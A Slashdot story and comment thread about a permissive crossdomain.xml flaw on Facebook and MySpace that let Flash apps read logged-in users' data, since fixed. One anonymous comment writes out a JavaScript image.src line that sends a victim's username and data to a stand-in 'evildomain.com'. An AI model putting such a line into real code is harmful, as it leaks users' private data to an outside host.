Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Facebook and MySpace Backdoors Found, Fixed

Soulskill posted more than 4 years ago | from the oh-adobe-you-card dept.

Bug 106

jamie writes with news of a Facebook app developer who found a significant security hole while he was trying to get around function limitations for his application. Quoting: "Luckily — just with browser AJAX requests — a flash application hosted on domain X is unable to open a file on domain Y. If this would be possible, domain X [would be] able to access content on domain Y, and when the user is logged in on domain Y retrieve and post back any personal data. In certain cases this could limit a Flash application's capabilities. ... To resolve such issues, Adobe (Flash's developers) introduced a 'crossdomain.xml' file which could allow certain domains to access another domain, leading to cross-domain access by certain or all domains. While indeed Facebook locked the front door from any non-Facebook domain access via Flash, a simple subdomain change allowed any flash application (domain="*") to access its domain data." He found a similar problem in MySpace's crossdomain.xml. Both sites were notified, and they have implemented fixes.

Sorry! There are no comments related to the filter you selected.

Huh. (5, Insightful)

Velorium (1068080) | more than 4 years ago | (#29996036)

I wonder how many people figured this out and didn't report it.

Re:Huh. (4, Informative)

girlintraining (1395911) | more than 4 years ago | (#29996242)

I wonder how many people figured this out and didn't report it.

They didn't need to figure it out... Facebook lets people suck all that data out by making a game about vampires, pirates, farming, or god only knows whatever else is out there. Why go through the back door when the front door is already open and a welcome mat thrown out?

Re:Huh. (1)

Monkeedude1212 (1560403) | more than 4 years ago | (#29996610)

Exactly. If you are in the business of stealing a persons data you're probably a hacker. If you're a hacker you probably know some programming. If you know some programming you can throw together a Facebook game over the course of a weekend.

Then once 3 million people use your App - you can access their data. ...

Have they fixed that yet? They've been aware of THAT problem for months.

Re:Huh. (1)

Aladrin (926209) | more than 4 years ago | (#29996736)

Game!? Hah! Throw together a 'quiz' and you'll have them signing up in droves. It's ridiculous.

As for as 'over the course of a weekend', I can attest to that. I managed to get Zend Framework to authenticate with Facebook and write the basic structure of a game in a weekend, while I was watching tv, playing games, reading both english and japanese, and I'm pretty sure I went out to see a movie, too. It's ridiculously easy to write something for Facebook.

Re:Huh. (1, Funny)

Anonymous Coward | more than 4 years ago | (#29999134)

araadarin san ha nihongo no hon o yomimasu ka? dou deshita ka?

Re:Huh. (1)

commodoresloat (172735) | more than 4 years ago | (#30002730)

I think "Tom" knew about it but he didn't tell anybody. Who knows, though; that guy is friends with everyone.

McCroskey (3, Funny)

Captain Splendid (673276) | more than 4 years ago | (#29996066)

Looks like I picked the wrong week to deactivate my FB account.

Re:McCroskey (2, Funny)

natehoy (1608657) | more than 4 years ago | (#29996176)

Surely you can't be serious?

Re:McCroskey (0)

Anonymous Coward | more than 4 years ago | (#29996274)

I am. And don't call me Shirley.

Damnit, people, can you see the problem here? (2, Funny)

Tetsujin (103070) | more than 4 years ago | (#29997360)

Surely you can't be serious?

I am. And don't call me Shirley.

People, do you not see the basic problem with using this joke in written format? Without a doubt this is a serious flaw in the English language: we are unable to use the "Don't call me Shirley" joke in written form because, while the words "Shirley" and "surely" are homonyms, the spelling is clearly different...

Ai propoz a simpl fix for this problem: Inglish speekurz shood standardaiz on a striktly phonetik sistem ov speling wurdz. Thas, thi standard "Shirley" jok wud bi exekyutid thus:
"Shirly yu kant bi sirius?"
"Ai em. And dont kal mi Shirly."

Ther, problem solvd.

Re:Damnit, people, can you see the problem here? (1)

mcgrew (92797) | more than 4 years ago | (#29997448)

Inglish speekurz shood standardaiz on a striktly phonetik sistem ov speling wurdz

Ok, is it spelled "kaw" (New England), Kower (south) Kore (midwest), Kwa (Nwoo Yawk)?

Is it window, winder, or windah?

And you spelled "uv" rong. See how this is such an incredibly BAD idea?

Re:Damnit, people, can you see the problem here? (1, Funny)

Tetsujin (103070) | more than 4 years ago | (#29998280)

Inglish speekurz shood standardaiz on a striktly phonetik sistem ov speling wurdz

Ok, is it spelled "kaw" (New England), Kower (south) Kore (midwest), Kwa (Nwoo Yawk)?

Is it window, winder, or windah?

And you spelled "uv" rong. See how this is such an incredibly BAD idea?

I did not spell "uv" wrong. The five vowels:

A E I O U

Take the following sounds:

Ah Eh EE Oh OO

This is in accordance with the usage of the vowels in other European languages, such as Spanish or Italian. Thus, the word "of" would be spelled "ov". "uv" would rhyme with "move"

Admittedly, some work would need to be done to refine the phonetic spelling system and to promote adoption and education of the new system. I figure in a generation or two we might be able to iron out these regional differences. Of course, some will resist these changes: if we can get the NSA involved to monitor SMS and internet usage and introduce FCC regulations requiring broadcasters and recording artists to always spell and pronounce things correctly, and institute a new bureau of ruthless and violent enforcement, it should be doable. The back-catalogue of music and literature will have to be either destroyed or republished, and owning old editions will have to be criminalized. It'd probably be a good idea to identify uncooperative parents and separate them from their children, so we can properly institutionalize them using the new system.

Oh, and we'll have to invade England, I think - this nonsense about English English being the authoritative version has got to stop. If we play our political cards right and keep anybody else from getting involved it should be a fairly straightforward war without too much loss of life. We may have to use a few tactical nuclear weapons, but I think once we've established a willingness to use them (say, on a minor city) the Brits will know we mean business. One Britain is down I think it should be relatively easy to make Canada fall in line. Australians and New Zealanders might be a bit of a challenge since they're so well known for their weird accents - we could institute a temporary cultural embargo, that should prevent contamination until we're ready to deal with them.

In the end it'll all be worth it, though, 'cause we'll be able to use the "Don't call me Shirley" joke in writing and it will work properly. Really, all manner of homonym-based jokes will finally be open to use in writing. It will usher in a new golden age of literature.

Re:Damnit, people, can you see the problem here? (1)

clone53421 (1310749) | more than 4 years ago | (#29998916)

No, because then how do you distinguish between the sounds in "of" and "over"?

Ah = [a]fter = aftr
Eh = [e]ffort = efert
EE = [e]ven = iven
Oh = [o]ver = ovr
OO = wh[o] = hu

but you still haven't covered several other vowel sounds:

AA = [a]pe
Ih = [i]gloo
II = [i]vory, [ey]es
Uh = [o]f, [a]ffect, [u]nder

Re:Damnit, people, can you see the problem here? (1)

Tetsujin (103070) | more than 4 years ago | (#29999130)

No, because then how do you distinguish between the sounds in "of" and "over"?

Long and short "o" sounds...

of = "ov"
over = "ouvr"

If we wanted to get really fancy we could introduce the schwa into the spelling system (to be more realistic for a moment - in reality a mad crusade to reform spelling would probably just adopt an existing, rigorous system of phonetics... I'm just working with basic latin characters 'cause it's easy for the purposes of this discussion...) but really, it's just as easy to leave it out.

but you still haven't covered several other vowel sounds:

AA = [a]pe
Ih = [i]gloo
II = [i]vory, [ey]es
Uh = [o]f, [a]ffect, [u]nder

Simple enough.

ape = "eip" (long "e" sound, terminating in "p")
igloo = "iglu" (straightforward, don't see the problem...)
ivory = "aivori", eyes = "aiz" (the "long I" is really just "a" transitioning into "i")
of = "ov", affect = "afekt", under = "andr"

People who pronounced "of" with an "a" sound would be escorted to re-education facilities for treatment... Their cases would be studied by re-education specialists, and if necessary they would be implanted with a small device which monitors their speech and delivers electric shocks when words are mispronounced... Priority cases would receive a version that uses a camera and OCR system to monitor their writing, as well.

Thus, the prosperity of the written form of the "Shirley" joke would be assured.

Re:Damnit, people, can you see the problem here? (1)

clone53421 (1310749) | more than 4 years ago | (#29999162)

of = "ov"
over = "ouvr"

If the "o" makes the same sound in "ouvr" as it does in "ov", then "ouvr" is next-to-impossible to pronounce (not to mention doesn't sound like it's supposed to).

If this is a phonetic system, the "o" has to always make the same sound.

Re:Damnit, people, can you see the problem here? (1)

Tetsujin (103070) | more than 4 years ago | (#29999304)

of = "ov"
over = "ouvr"

If the "o" makes the same sound in "ouvr" as it does in "ov", then "ouvr" is next-to-impossible to pronounce (not to mention doesn't sound like it's supposed to).

If this is a phonetic system, the "o" has to always make the same sound.

Well, in any case, "o" doesn't appear in the word "Shirley" so the prosperity of the Shirley joke in written form is unaffected.

(In retrospect, it is possible that "av" would be a better spelling of "of" - despite my earlier statement that people who use this pronunciation would be detained and forcibly re-educated under the new system...)

If you want to be really realistic about what sort of phonetic system a vastly powerful, phonetics-system-crusading mad regime would choose to force standardization of English spellings, then probably they would use something more rigorous. But something with a bunch of Unicode characters wouldn't really work on Slashdot for the purposes of this discussion... :)

Though, I have to say - my original Shirley Joke comment here probably would have been funnier if it had been done up in full IPA or something...

Re:Damnit, people, can you see the problem here? (1)

clone53421 (1310749) | more than 4 years ago | (#29999676)

Meh. No offense, but I didn't think your "Shirley" joke was funny in the first place. It works just fine in written form because everyone knows it already and it got its humour from the original, not the written version.

Add-Homonym attack! (1)

Tetsujin (103070) | more than 4 years ago | (#30001554)

Meh. No offense, but I didn't think your "Shirley" joke was funny in the first place. It works just fine in written form because everyone knows it already and it got its humour from the original, not the written version.

No offense taken. Anybody who's gonna take a crack at being funny has to be willing to accept that sometimes it doesn't work out. :) I'm only funny sometimes - I can live with that.

Personally I don't think homonym-based jokes work at all well in text... By their nature they rely on ambiguity that doesn't exist in text. Sometimes it's a real drag, 'cause I like those kinds of jokes.

Re:Add-Homonym attack! (1)

clone53421 (1310749) | more than 4 years ago | (#30004930)

Anybody who's gonna take a crack at being funny has to be willing to accept that sometimes it doesn't work out.

As someone who has both gotten funny mods on posts that weren't intended to be funny, and gotten Anonymous Coward posts up-modded to +5 Funny when I thought they'd be a little too trollish/flamebaitish to risk posting as myself (that sucks, btw), I must say I understand and agree.

Re:Damnit, people, can you see the problem here? (1)

mcgrew (92797) | more than 4 years ago | (#29999228)

I did not spell "uv" wrong. The five vowels:

A E I O U

Take the following sounds:

Ah Eh EE Oh OO

This is in accordance with the usage of the vowels in other European languages, such as Spanish or Italian. Thus, the word "of" would be spelled "ov". "uv" would rhyme with "move"

Then spell "duh" using Spanish phonetics. You're arguing against your own point.

I figure in a generation or two we might be able to iron out these regional differences

We've had radio for a hundred years and TV for almost eighty. If you were right we'd already have gotten rid of regional and cultural differences.

Of course, some will resist these changes

Some meaning "almost everybody". Humorous comment!

Properly written English is far more understandable than spoken English.

Re:Damnit, people, can you see the problem here? (1)

Tetsujin (103070) | more than 4 years ago | (#29999496)

Then spell "duh" using Spanish phonetics.

duh = "da" - or maybe just "d"

I'll admit that's not perfect. I believe this is a sound that would phonetically be marked with a "schwa". There are rigorous phonetics systems that do exist and can cover cases like this - for the purposes of outlining the proposed campaign to secure the prosperity of the written form of the "Shirley" joke (on a system that doesn't support Unicode) I've had to make do with the regular Latin character set.

I figure in a generation or two we might be able to iron out these regional differences

We've had radio for a hundred years and TV for almost eighty. If you were right we'd already have gotten rid of regional and cultural differences.

Well, no, because we haven't made a concerted effort (paired with violent and rigorous enforcement) to eliminate deviations from the established standard. Rather, we've allowed these deviations to flourish through pop culture, where their novelty earns them respect...

Of course, some will resist these changes

Some meaning "almost everybody".

Well, of course there will be substantial resistance. It just sounds nicer if one describes it as "some" resistance. But, as I said, I feel that the threat of nuclear weapons will be adequate to quell any large-scale opposition to this important change.

Humorous comment!

<MST3K>thank you!</MST3K>

Re:Damnit, people, can you see the problem here? (1)

pwfffff (1517213) | more than 4 years ago | (#29998316)

It wasn't a joke, it was a popular culture reference. I'd imagine that you're neither popular nor cultured; that would explain your total failure to 'get it'.

Re:Damnit, people, can you see the problem here? (1)

roguetrick (1147853) | more than 4 years ago | (#29998496)

Yes, Airplane! is for the fine cultured palate. The comment wasn't meant to be funny, it was meant as social commentary regarding new technology. Now lets all spout out some Monty Python quotes and give each other handjobs with our pinkies curled.

Re:Damnit, people, can you see the problem here? (1)

Tetsujin (103070) | more than 4 years ago | (#29998816)

It wasn't a joke, it was a popular culture reference. I'd imagine that you're neither popular nor cultured; that would explain your total failure to 'get it'.

Dude, what are you talking about?

It's a joke and a pop culture reference. I get it. I've seen "Airplane". I use this joke myself more than is really appropriate.

But every time a cherry of an opportunity for a "Don't call me Shirley" joke appears in text the opportunity is wasted by the fact that the difference in spelling pretty much kills the joke. It's as if, by the simple act of presenting the joke in written form, the entire funny part of it has been extracted and painstakingly explained at length.

This is why I advocate a violent campaign to force all English speakers to adopt a truly phonetic system of spelling and standardized pronunciation: when this is accomplished, we will be able to use the "Shirley" joke in written form without it being blunted by the fact that the spelling is different. This will also mean that the book adaptation of "Airplane!" can finally be published!

Re:Damnit, people, can you see the problem here? (0)

Anonymous Coward | more than 4 years ago | (#30000060)

Get off the internet. It's clearly having an adverse effect on your sense of humor.

Or is that just how you are natchurallee?

Re:Damnit, people, can you see the problem here? (0)

Anonymous Coward | more than 4 years ago | (#30005884)

while the words "Shirley" and "surely" are homonyms, the spelling is clearly different

Thus, they are homophones, not homonyms.

Re:McCroskey (0)

Anonymous Coward | more than 4 years ago | (#29996418)

I want the kids in bed by nine, I want the dog fed, the yard watered, and the gate locked. And get a note to the milkman: no more cheese!

Re:McCroskey (1)

riff420 (810435) | more than 4 years ago | (#29996902)

In what fucking universe is what you said funny?

Re:McCroskey (1)

tenton (181778) | more than 4 years ago | (#29997834)

The one where people have actually watched the movie "Airplane!"

Re:McCroskey (1)

megamerican (1073936) | more than 4 years ago | (#29996180)

Looks like I picked the wrong week to deactivate my FB account.

Why? I've been on facebook since late 2004 and have never used a single app. You'd have been perfectly safe if you never used them or only used ones which you absolutely trusted.

Re:McCroskey (1)

Itninja (937614) | more than 4 years ago | (#29996236)

Wow...that's like the year FB started...back when it was The Facebook. Yet you have a 7 digit /. ID. Not sure what how much geekcred that averages out to.

Re:McCroskey (4, Interesting)

darthflo (1095225) | more than 4 years ago | (#29996262)

Curiously few people seem to have gotten that. I've got an account named "John Doe" to try 'em out and another one which I add people I know to. Funnily, John Doe has several hundred friends already, despite not actually existing.

Re:McCroskey (0)

Anonymous Coward | more than 4 years ago | (#30003624)

Curiously few people seem to have gotten that. I've got an account named "John Doe" to try 'em out and another one which I add people I know to. Funnily, John Doe has several hundred friends already, despite not actually existing.

So that's why I get hate mail from people I don't even know, you insensitive clods...
-JD

Re:McCroskey (4, Insightful)

natehoy (1608657) | more than 4 years ago | (#29996266)

If I understand it, I have significant access to my friends' data on Facebook. When *I* sign up for an account, the app not only has access to my data, but any and all data I have access to. So you might not have given access to your data, but a friend might.

Plus, doesn't Facebook use Flash on a few of their ads? With the old crossdomain setting, Facebook's advertisers could also have gained access to your data.

Don't post anything on Facebook you aren't comfortable telling your friends, your boss, your wife, or any random stranger.

Re:McCroskey (1)

CannonballHead (842625) | more than 4 years ago | (#29996704)

Don't post anything on Facebook you aren't comfortable telling your friends, your boss, your wife, or any random stranger.

It's sad you have to tell people this.

It's like putting up fliers on telephone poles and signing your name (and picture) with it. And then asking how people found out.

Re:McCroskey (1)

ThatsNotPudding (1045640) | more than 4 years ago | (#29997430)

Don't post anything on Facebook.

Fixed it for you.

Re:McCroskey (1)

0100010001010011 (652467) | more than 4 years ago | (#29998770)

Facebook has nearly the equivalent of ACLs. Learn to use the groups and privacy functions. You can put people into groups and then give groups, or individual people access (or block access) to nearly any aspect of the site. (And I'm guessing by extension Apps that those people use).

Right now everything is locked down to the point that NO ONE can see anything by default. You can't even search me by name because I don't 'exist'. No pictures, no information, nothing.

I have "Family", "Friends", "Acquaintances", "Co-Workers", etc.

If I want to share that great night out at the bars, my Friends get access and then my cousin that's the same as me.

Those family vacation photos: Family and Co-Workers.

My full name address and cell phone: Family, Friends & Co-Workers.

Benign information: Acquaintances.

Re:McCroskey (2, Informative)

natehoy (1608657) | more than 4 years ago | (#29999050)

So if someone in your "Family" group wants to find out what kind of left-handed vampire they are, then the app they are running has the same access to your profile that they do.

That's the problem. You might trust the person, but they are running apps that might not be as trustworthy, and those apps adopt their Facebook authority to run.

At least that's how I understand it.

Well? (1)

commodoresloat (172735) | more than 4 years ago | (#30002748)

Get to the point, man. What kind of left-handed vampire are they?

Re:McCroskey (0)

Anonymous Coward | more than 4 years ago | (#30002934)

Don't post anything on Facebook you aren't comfortable telling your friends, your boss, your wife, or any random stranger.

I don't have any problem telling my secrets to random strangers. Just don't tell my friends or my boss, and especially don't tell my family.

Re:McCroskey (1)

wiz31337 (154231) | more than 4 years ago | (#29996318)

I agree, unfortunately there are a lot of people that don't realize this and will click on any and every cool looking app out there.

However, even if your Facebook account is compromised people need to realize that they should only be putting information on their page that they want the whole world to see. If people would just ask themselves one question "Am I ok with my [boss, wife, mom, complete stranger] knowing this" before posting a lot of issues could be avoided.

Re:McCroskey (1)

bi_boy (630968) | more than 4 years ago | (#29996666)

The problem is if any of your friends used an app or took quiz that means all of your information was compromised also.

Re:McCroskey (1)

rickb928 (945187) | more than 4 years ago | (#29996820)

Maybe someone can help you with that? Whether you know it or not?

Blunderware... (1, Interesting)

adosch (1397357) | more than 4 years ago | (#29996184)

I feel it as a personal accomplishment I *dont* have social network accounts on Facebook, Myspace and alike. It's bad enough people openly don't care about privacy or salvaging their identity, but ITFA, this clearly lets you 0wn any account in an auto-login status. And the guy is absolutely right... what typical, non-aware user doesn't? Glad to see all those bad script-kiddie hack sites that boast breaking into social network accounts for $100 a pop will lose a bit of their income to buy Mt. Dew and oreos due to this being publicly uncovered...

Re:Blunderware... (2, Insightful)

maxume (22995) | more than 4 years ago | (#29996406)

Well, it is an achievement, much in the same way that not eating a bucket of KFC everyday is an achievement

Re:Blunderware... (0, Insightful)

Anonymous Coward | more than 4 years ago | (#29996416)

I feel it as a personal accomplishment I *dont* have social network accounts on Facebook, Myspace and alike.

I hate to break this to you.... wait, actually I rather enjoy it. I was just trying to be polite. Let's face it, you're on Slashdot. You're either an asshole, a moron, or a zealot. Possibly even a combination of all 3. People in real life don't want to associate with you, much less be your friend in a social network. Let's also be clear about something here. You aren't important enough for anyone to want your information. That's just the way it is. There is no reason for you to feel accomplished in not having an account. Nothing you have actually matters to anyone except you.

Re:Blunderware... (0, Flamebait)

Velorium (1068080) | more than 4 years ago | (#29996518)

Apparently you fit under the category of asshole? Sadly I already posted and can't mod this flamebait.

Re:Blunderware... (1)

tibman (623933) | more than 4 years ago | (#29996718)

There are actually accomplished non-asshole, intelligent, and fair-minded people here on slashdot. Somewhere... hidden among all the assholes.. probably..

Also, you are dead wrong :) data-mining anyone and everyone seems to be a very popular thing, whether you think the people are important or not.

Re:Blunderware... (1)

Nerdfest (867930) | more than 4 years ago | (#29996942)

There are actually accomplished non-asshole, intelligent, and fair-minded people here on slashdot.

Those would be the zealots.

Re:Blunderware... (1)

tibman (623933) | more than 4 years ago | (#29997262)

Zealot isn't like a class you pick when you signup for slashdot... though maybe a class system would clear the air a bit

Just saying! hah.

Re:Blunderware... (1)

Nerdfest (867930) | more than 4 years ago | (#29997426)

That my friend, is an excellent idea. You could even earn levels.

Re:Blunderware... (1)

colesw (951825) | more than 4 years ago | (#29997708)

And also earn Achievements!

Re:Blunderware... (1)

Dragonslicer (991472) | more than 4 years ago | (#29998894)

Zealot isn't like a class you pick when you signup for slashdot...

Yeah, you have to spend at least a couple months as a Marine or Zergling first.

Re:Blunderware... (0)

Anonymous Coward | more than 4 years ago | (#29998526)

Somewhere... hidden among all the assholes.. probably..

It's called "kidnapping" and we're trying to keep it secret, so hush!

Re:Blunderware... (1)

TheRaven64 (641858) | more than 4 years ago | (#29996862)

I think you might be projecting a bit there. Lots of us have offline lives too. I don't have an account on any social networking sites either. I set up a mailing list for my friends to use to organise social activities. It's trivial for them to use: just send a mail to the address and everyone else gets it. Even the least technical of them can manage that, while a few of them have problems with Facebook. I don't get the shared online photo album stuff, but people show me photos at parties instead so I don't feel like I'm missing out.

Re:Blunderware... (1)

Fast Thick Pants (1081517) | more than 4 years ago | (#29997064)

You aren't important enough for anyone to want your information.

Incorrect if...

  • you have a bank account with cash
  • you have a credit card or decent credit
  • you've pissed off someone who's tech-savvy, or who'll hire a tech-savvy private investigator
  • you have an attractive cousin
  • cetera...

Re:Blunderware... (0)

Anonymous Coward | more than 4 years ago | (#29997132)

Also if you ever apply for a job with a company that does any sort of background check. Although at this point it might be more of a red flag if they *can't* find anything about you online, 'cause that would mean you're sneaky.

Re:Blunderware... (0)

Anonymous Coward | more than 4 years ago | (#30003474)

Also if you ever apply for a job with a company that does any sort of background check. Although at this point it might be more of a red flag if they *can't* find anything about you online, 'cause that would mean you're sneaky.

Or it could mean absolutely nothing at all. The background report is guaranteed to contain standard issue stuff that is available from public records.

-Where you live/have lived and some people that lived at the same residence in the same time period.

-credit history, bankruptcy filings, financial info

-criminal history, driver's license photo

etc

And possibly your work history if a linkedin bot or something built a profile for you because your name was on a corporate webpage.

They will find stuff online and your report will not be blank. You generate a trail merely by existing in society. This is what will be given as your background report and it will likely pass. Lack of a Myspace or Facebook would hardly be incriminating, unless you're applying for a job that requires you to have excellent networking and social skills. So since you're on slashdot I doubt that means you. ;)

Re:Blunderware... (0)

Anonymous Coward | more than 4 years ago | (#29997306)

How the hell is this insightful? He insults the GP and then makes wrong conclusions while conveniently forgetting the fact that data mining is not targeted at anyone especially...

Re:Blunderware... (1)

Arthur Grumbine (1086397) | more than 4 years ago | (#29998202)

I'm guessing those mods are the kind of folks who are very sensitive about the how many "friends" they have on social network sites, and don't like anyone raining on their parade - consequently supporting anyone who lashes out at people who don't need the constant sense of validation that social networks bring.

Re: Ogre updated his status! (0)

Anonymous Coward | more than 4 years ago | (#30003374)

I'm guessing those mods are the kind of folks who are very sensitive about the how many "friends" they have on social network sites, and don't like anyone raining on their parade - consequently supporting anyone who lashes out at people who don't need the constant sense of validation that social networks bring.

NNNNNNEEEEEERRRRDDDDS!!!

Re:Blunderware... (1)

Dhalka226 (559740) | more than 4 years ago | (#30001104)

Let's face it, you're on Slashdot. You're either an asshole, a moron, or a zealot.

The irony abounds.

Re:Blunderware... (1)

MrPhilby (1493541) | more than 4 years ago | (#30001830)

I find it hard to choose

Re:Blunderware... (3, Funny)

imakemusic (1164993) | more than 4 years ago | (#29996474)

I feel it as a personal accomplishment I *dont* have social network accounts on Facebook, Myspace and alike.

Well, you say that but we all know it's because you don't have any friends.

Re:Blunderware... (1)

adosch (1397357) | more than 4 years ago | (#29997394)

...no, it's not anything like that. It's so I don't have to be like you and brag about your mega-uber friend list which is solely derived off your MySpace hit counter. Friends don't comein quantities, they are counted by quality. Wait until the next viral social fag-wagon hits... you'll be the next emo kid to slit your wrists b/c you don't have any more "friends".

Re:Blunderware... (1)

Dragonslicer (991472) | more than 4 years ago | (#29998960)

It's so I don't have to be like you and brag about your mega-uber friend list which is solely derived off your MySpace hit counter.

Instead you can brag about how you're too good to have an account on any such sites.

I think The Onion needs to do a follow-up to the feature article about the man who doesn't have cable television.

Re:Blunderware... (1)

adosch (1397357) | more than 4 years ago | (#29999664)

Instead you can brag about how you're too good to have an account on any such sites.

...too good? or not a passive, social parasite looking for any outlet to 'get noticed' or 'get attention'. You choose to waste your time posting to the world about what you did every 5 minutes for the last hour with your My-Twit-Face account and 'hope' your friends make time to observe it. I simply take that time and spend it with my friends.

Re:Blunderware... (1)

mcgrew (92797) | more than 4 years ago | (#29998474)

Hey, you're right! [slashdot.org] He does have one fan, [slashdot.org] though.

Re:Blunderware... (1)

Culture20 (968837) | more than 4 years ago | (#29996648)

I feel it as a personal accomplishment I *dont* have social network accounts on Facebook, Myspace and alike.

Wait, so that's a fake you on FB whose last status update was "I <3 my little ponies"? I can't be your friend any more. I like the FB you better.

Re:Blunderware... (1)

tibman (623933) | more than 4 years ago | (#29996904)

I will agree with you that it's a small accomplishment to not have a social networking account anywhere. Mostly because everyone goes "sign up so we can do X together" or "sign up so we can be 'in a relationship' together" or whatever other viral method of spreading is popular today.

I still have an LJ account from around the time i first signed up at slashdot. *sigh* yes! i know that is a blog.. and yes i know that blogs aren't cool anymore. But what i discovered is that when it became uncool.. suddenly the quality of posts and comments improved! It's obvious why in hindsight, really.

Re:Blunderware... (1)

JonJ (907502) | more than 4 years ago | (#29999244)

"sign up so we can be 'in a relationship' together"

Be in a what together? Does this require that I leave my basement? In that case, no thanks!

Re:Blunderware... (0)

Anonymous Coward | more than 4 years ago | (#30003334)

Want to know a little secret? No one cares. By acting like having a Facebook account is a big deal...you are in fact making it a big deal.

People like to think that everything they post will be immortalized or that it has incredible importance, but it won't and it doesn't. Someday Facebook will die and will take all your bitchy wall posts, drunken status updates, and embarrassing photos with it. Choose to use it or don't. Choose to post all your info on it or choose not to. Neither decision is really that big of a deal.

As far as breaking into accounts...are you twelve or something? Who would care? What's the former account owner to do? End his life, or set up a new account? "A whole evening ruined! Curse you, Facebook hackers!".

It's just a crappy contact list/message board app after all, and not the be all end all of the world it exists in. To consider that some people think it actually *is* their identity is absurd beyond belief. I don't know whether to laugh, cry or shrug.

What about image.src? (0)

Anonymous Coward | more than 4 years ago | (#29996260)

Couldn't an evil app always send out sensitive information via:

image.src="http://evildomain.com/script?username=victim&sensitiveinfo=gotcha"

Re:What about image.src? (1)

gazbo (517111) | more than 4 years ago | (#29996656)

This story's about accessing private data in the first place, not sending the data once accessed.

Re:What about image.src? (0)

Anonymous Coward | more than 4 years ago | (#29997450)

I was under the impression that the crossdomain.xml file was applied to the server hosting the flash app, but it looks like it is the other way around. In my opinion, this is bassackwards.

maybe (0)

Anonymous Coward | more than 4 years ago | (#29996328)

this why the fb chat plugin for pidgin/adium is broken?

Re:maybe (1)

Velorium (1068080) | more than 4 years ago | (#29996560)

That's an interesting thought. Throw Digsby into the mix too, as they had a patch just the other day to fix facebook chat.

Re:maybe (1)

F-3582 (996772) | more than 4 years ago | (#29996720)

They just got updated with a fix for that issue.

How much did paypal pay for that domain? (1)

OCURServant (1526983) | more than 4 years ago | (#29996362)

God damn paypal! Always messing things up

Damn (1)

kenp2002 (545495) | more than 4 years ago | (#29996446)

There went my plan for consulting for HR departments by checking Facebook and Myspace profiles. Guess I am stuck snooping Slashdot accounts and news sites for $10 a person.

Re:Damn (1)

MillionthMonkey (240664) | more than 4 years ago | (#29998546)

Ask the guy if you can buy (share) his identity so you can take the MySpace job offer while he takes the one from Facebook.

Maybe YOU can be the one at Facebook instead, if you offer enough cash, but they might be better able to figure out who you are.

Facebook is a buggy mess (4, Insightful)

WankersRevenge (452399) | more than 4 years ago | (#29996594)

It amazes me that facebook rose to prominence in the way it did. Out of all the sites I have ever used, Facebook is the worst when it comes to bugs. It simply floors me at how much bad code is pushed out to production servers or how many things break on a daily basis. I'm not talking simple copy bugs, but full on showstopping bugs. At one point, I was filing bug reports to them on a daily basis. If there is any qa department, it is incredibly lax. I'm guessing it's just a couple of interns sniffing for a gig. The only reason I'm using facebook is to grow my zombie blog, and once I reach a point where my traffic isn't dependent on that site, I'm dropping them like a friggin rock. And it will be a glorious day indeed.

Re:Facebook is a buggy mess (1)

Chameleon Man (1304729) | more than 4 years ago | (#29997342)

This interview [youtube.com] gives a brief glimpse as to how Facebook's office dynamic is like. Surprised they get anything done.

Re:Facebook is a buggy mess (1)

mcgrew (92797) | more than 4 years ago | (#29998778)

Out of all the sites I have ever used, Facebook is the worst when it comes to bugs.

I see you've never been to slashdot.

Re:Facebook is a buggy mess (1)

Dragonslicer (991472) | more than 4 years ago | (#29998998)

Out of all the sites I have ever used, Facebook is the worst when it comes to bugs.

All three of them?

Re:Facebook is a buggy mess (1)

stephanruby (542433) | more than 4 years ago | (#29999654)

Out of all the sites I have ever used, Facebook is the worst when it comes to bugs.

I'm guessing you've never used friendster, myspace, or slashdot.

Re:Facebook is a buggy mess (1)

commodoresloat (172735) | more than 4 years ago | (#30002766)

The only reason I'm using facebook is to grow my zombie blog....

There was once a day you just didn't hear sentences like this.

Now if only Adobe would... (1)

Dracos (107777) | more than 4 years ago | (#29996796)

Remove Flash's ability for cross-domain cookies. Browser plugins should use the browser's cookie storage, IMO.

I'm wondering... (1)

clone53421 (1310749) | more than 4 years ago | (#29997188)

What about the backdoor that lets you find someone's picture album and their profile if you have the filename of one of their pictures from the album (say, someone dragged the picture into a folder, and then e-mailed it or posted it on a message board, thinking that since they're not posting a link to the facebook photo they're anonymous)?

Will they ever fix that?

Re:I'm wondering... (0)

Anonymous Coward | more than 4 years ago | (#29997598)

That isn't really a back door, per se. It can reveal someone's profile ID number, but knowing that only allows you access to any parts of the person's profile that are publicly viewable. It isn't an ideal situation, but if you're foolish enough to post a photo on a message board somewhere without sanitizing the metadata (and in this case, the file name is a type of metadata), that is hardly Facebook's fault—no more than it would be Canon or Nokia's fault if someone posted a photo with his home's GPS coordinates in the metadata.

Re:I'm wondering... (1)

clone53421 (1310749) | more than 4 years ago | (#29997778)

It also allows you to see all the other photos in that album, even if the album isn't publicly accessible.

Re:I'm wondering... (1)

clone53421 (1310749) | more than 4 years ago | (#29997908)

Regarding sanitizing the metadata, it's not apparent from just glancing at the filename that it contains this information. You have to know, and most people don't.

It could be relatively easily fixed, too... just use a script to generate the data and pass it in the path name, not the filename. E.g. /image.php/123/456/789/arbitraryfilename.jpg. "arbitraryfilename" can be anything you want it to be, so long as image.php knows to ignore it.

Cross d'oh! man (0)

Anonymous Coward | more than 4 years ago | (#29997298)

The rise of the "cross d'oh! man" http://bit.ly/1x3krU (from http://twitter.com/vambenepe/status/5455193554)

Facebook Spam (1)

pipingguy (566974) | more than 4 years ago | (#29997558)

Yeah, I'm a lamer, I have a FaceBook account.

Am I the only one who's been getting a shitload of FaceBook spam recently?

Thank god (1)

OricAtmos48K (979353) | more than 4 years ago | (#29998634)

I am happy to hear that the patch is out in action otherwise WOULD YOU LIKE TO ENLARGE YOUR P**IS ?

have I understood correctly? (1)

dropadrop (1057046) | more than 4 years ago | (#29999168)

So did I get this correctly...

I have a crossdomain.xml file on my website a.com with a very lax policy (allow *). This means that pretty much any flash file I open from any other site can access a.com and see (or copy) data with my permissions? If I have auto-login enabled (as in the facebook example) it can log in with my cookies and collect the data without the site being open, and if my site does not feature auto login it can still access the data given I have an open session?

Facebook Chat (0)

Anonymous Coward | more than 4 years ago | (#30000146)

Has anyone here notice a bug that allows you to see online friends on your iphone that aren't online on the computer? This bug persists with the same friends even after reboot of the ipod and computer.

Other sites (0)

